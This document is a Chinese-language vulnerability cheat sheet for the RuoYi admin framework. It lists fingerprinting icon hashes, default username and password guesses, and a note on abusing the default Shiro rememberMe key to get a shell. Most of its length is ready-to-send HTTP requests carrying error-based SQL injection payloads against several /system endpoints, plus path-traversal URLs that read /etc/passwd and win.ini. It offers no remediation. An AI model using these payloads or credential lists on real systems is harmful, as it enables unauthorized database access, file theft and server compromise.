若依(RuoYi)框架漏洞总结

0x01 特征
绿若依
icon_hash=”706913071”

蓝若依
icon_hash=” -1231872293”

0x02 漏洞

弱口令

用户：admin ruoyi druid            
密码：123456 admin druid admin123 admin888

若依前台默认shiro key命令执行漏洞
若依默认使用shiro组件，所以可以试试shiro经典的rememberMe漏洞来getshell。

影响版本
RuoYi<V-4.6.2

密钥存放位置

默认密钥

RuoYi-4.6.2版本开始就使用随机密钥的方式，而不使用固定密钥，若要使用固定密钥需要开发者自己指定密钥，因此4.6.2版本以后,在没有获取到密钥的请情况下无法再进行利用。

RuoYi-4.2版本使用的是shiro-1.4.2在该版本和该版本之后都需要勾选AES GCM模式。

SQL注入

• /system/role/list接口（<V-4.6.2）
  接口
  
  POC

POST /system/role/list HTTP/1.1
Host: 
Content-Length: 200
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=ddbcb9ac-2a67-46a4-88d8-fbf6a00d53fc
Connection: keep-alivepageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params[dataScope]=and extractvalue(1,concat(0x7e,(select version()),0x7e))

• /system/role/export （<V-4.6.2）
  
  POC

POST /system/role/export HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

• /system/user/list （<V-4.6.2）
  POC

POST /system/user/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

• /system/dept/list （<V-4.6.2）

POC

POST /system/dept/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

• /role/authUser/allocatedList （<V-4.6.2）

POC

POST /system/role/authUser/allocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

• /role/authUser/unallocatedList
  POC

POST /system/role/authUser/unallocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

CNVD-2021-01931任意文件下载
影响版本
RuoYi<4.5.1

路径

/common/download/resource
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini